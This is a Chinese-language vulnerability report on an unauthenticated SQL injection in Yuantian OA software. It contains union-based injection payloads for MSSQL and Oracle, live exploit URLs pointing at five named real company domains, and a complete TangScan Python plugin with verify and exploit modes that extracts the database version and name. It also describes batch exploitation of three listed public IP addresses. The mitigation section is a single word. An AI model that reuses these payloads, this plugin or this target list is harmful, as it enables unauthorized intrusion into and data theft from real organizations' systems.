1）通用型SQL注入漏洞廠商：源天軟件

    網(wǎng)址：http://www.visionsoft.com.cn/

    漏洞鏈接：ServiceAction/com.velcro.base.DataAction

    說明：該oa系統(tǒng)使用mssql和oracle兩個(gè)類型的數(shù)據(jù)庫，

某OA通用型SQL注入漏洞

    利用POC：

    MsSql數(shù)據(jù)庫：

    ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true

    Oracle數(shù)據(jù)庫：

    ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true

    （直接訪問即可）：

    MsSql部分

    A）http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

    B）http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

    C）http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

    Oracle部分

    D）http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true

    E）http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true

    2）說好的為了支持 TangScan 而來直接給出編寫好的插件代碼（本人代碼盲，瞎寫的，大牛勿噴），等公布時(shí)，該插件已經(jīng)入庫 TangScan.com 。

#! /usr/bin/env python# -*- coding: utf-8 -*-"""Copyright (c) 2013-2014 TangScan developers (http://www.wooyun.org/)See the file 'docs/COPYING' for copying permissionauthor: fate0"""import refrom thirdparty import requestsfrom modules.exploit import TSExploit__all__ = ['TangScan']class TangScan(TSExploit):    def __init__(self):        super(self.__class__, self).__init__()        self.info = {            "name": "源天軟件OA辦公系統(tǒng) sql 注入MSSQL版漏洞（無需登錄）",            "product": "源天",            "product_version": "",            "desc": """                OA辦公系統(tǒng) /ServiceAction/com.velcro.base.DataAction 中的 sql 參數(shù)存在注入, 將導(dǎo)致敏感數(shù)據(jù)泄漏            """,            "license": self.license.TS,            "author": ["Coody"],            "ref": [                {self.ref.wooyun: "暫無"},            ],            "type": self.type.injection,            "severity": self.severity.high,            "privileged": False,            "disclosure_date": "2015-07-22",            "create_date": "2015-07-23",        }        self.register_option({            "url": {                "default": "",                "required": True,                "choices": [],                "convert": self.convert.url_field,                "desc": "目標(biāo) url"            }        })        self.register_result({            "status": False,            "data": {                "db_info": {                    "version": "",                    "current_db": ""                }            },            "description": "",            "error": ""        })    def verify(self):        self.print_debug("verify start")        re_version_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE) exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true".format(domain=self.option.url))        try:            response = requests.get(exp_url, timeout=15, verify=False)        except Exception, e:            self.result.error = str(e)            return        re_result = re_version_pattern.findall(response.content)        if len(re_result) == 0:            self.result.status = False            return        self.result.status = True        self.result.data.db_info.version = re_result[0]        self.result.description = "目標(biāo) {url} 存在sql注入, 目標(biāo)使用數(shù)據(jù)庫版本為: {db_version}".format(            url=self.option.url,            db_version=re_result[0]        )    def exploit(self):        self.print_debug("exploit start")        re_userinfo_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE)        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select db_name()&isworkflow=true".format(domain=self.option.url))        try:            response = requests.get(exp_url, timeout=15, verify=False)        except Exception, e:            self.result.error = str(e)            return        re_result = re_userinfo_pattern.findall(response.content)        if len(re_result) == 0:            self.result.status = False            return        self.result.status = True        self.result.data.db_info.current_db = re_result[0]        self.result.description = "目標(biāo) {url} 存在sql注入, 數(shù)據(jù)庫名稱為: {current_db}".format(            url=self.option.url,            current_db=self.result.data.db_info.current_db        )if __name__ == '__main__':    from modules.main import main    main(TangScan())

    執(zhí)行 --mode verify （默認(rèn)）

    執(zhí)行 --mode exploit

    插件運(yùn)行正常，能夠順利輸出數(shù)據(jù)，

電腦資料

    到這里本來應(yīng)該結(jié)束了

    但是我手賤

    給出批量檢測(cè)網(wǎng)站的腳本測(cè)試結(jié)果

    測(cè)試的網(wǎng)站分別是：

    http://60.12.113.234:8080/

    http://121.14.195.31:8081/

    http://218.246.22.194:8080/

    測(cè)試中，直接執(zhí)行 --mode exploit ，批量獲取數(shù)據(jù)庫名稱吧。

    測(cè)試完畢，看下結(jié)果文件 success.txt 內(nèi)容

    嗯、到這里該結(jié)束了···

解決方案：

    過濾